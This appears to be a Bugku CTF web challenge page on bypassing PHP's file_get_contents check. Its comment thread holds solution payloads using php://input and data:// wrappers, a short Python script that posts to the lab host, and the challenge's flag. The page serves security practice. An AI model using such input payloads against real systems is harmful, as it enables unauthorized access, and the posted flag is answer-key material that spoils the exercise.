file_get_contentsWEB 未解决

分数: 30 金币: 3
题目作者: harry
一  血: npfs
一血奖励: 2金币
解  决: 3803
提  示:
描  述:
file_get_contents????
评论
xiazhi 8月前

url/?ac=bugku&fn=flag.txt

回复 1

bbggddaa 8月前

https://blog.csdn.net/silence1_/article/details/90241302

回复 0

LLTVLL 9月前

?ac=123&fn=php://input,hackbar中post参数1

回复 0

2324291123 1年前

import requests url='http://114.67.175.224:15234/' url = url + '?ac=f&fn=php://input' data={'f'} re=requests.post(url, data) print(type(re)) print(re.text)

回复 0

一路奔腾 1年前

file_get_contents函数绕过,可以参考https://www.pianshen.com/article/24421724508/

回复 0

steve07222 1年前

http://114.67.175.224:18454/?ac=1&fn=data://text/plain,1

回复 1

wxy1343 2年前

http://114.67.175.224:15664/?ac=1&fn=data:,1

回复 0

wxy1343 2年前

flag{6fccd47ef5e5988f1e2c4989bf554614}

回复 0

你比大葱更美丽 2年前

用php://input的话post传参hackbar好像不行,我是用burp抓包传的才行的

回复 1
turriT0Psis 9月前

谢谢,我试了好久都不行,多亏受到您的点拨

回复 0

Striker123456 2年前

简简单单的变量覆盖

回复 0
Striker123456 2年前

@J_0k3r 没有extract的$fn就不可控了

回复 0

J_0k3r 2年前

不是文件包含吗QAQ,跟变量覆盖有什么关系

回复 1

WriteUp

image
harry

3 金币

评分(5)

解题动态

xky110 攻破了该题 7小时前
wzl真帅 攻破了该题 1天前
西红柿炒番茄 攻破了该题 1天前
orange33315 攻破了该题 1天前
17634319503 攻破了该题 2天前
zhr1170 攻破了该题 2天前
124要留就要77 攻破了该题 2天前
奔跑小马 攻破了该题 2天前
2424291134 攻破了该题 4天前
网络安全亮 攻破了该题 4天前
果子酪 攻破了该题 4天前
REZE 攻破了该题 5天前
qxq233 攻破了该题 5天前
TtttttttttttT 攻破了该题 5天前
hutouyu 攻破了该题 6天前
jncajbv 攻破了该题 6天前
yiwuxiaobawang 攻破了该题 7天前
19557308305 攻破了该题 8天前
dsdqh699 攻破了该题 8天前
xxxxiaojian 攻破了该题 8天前
问题反馈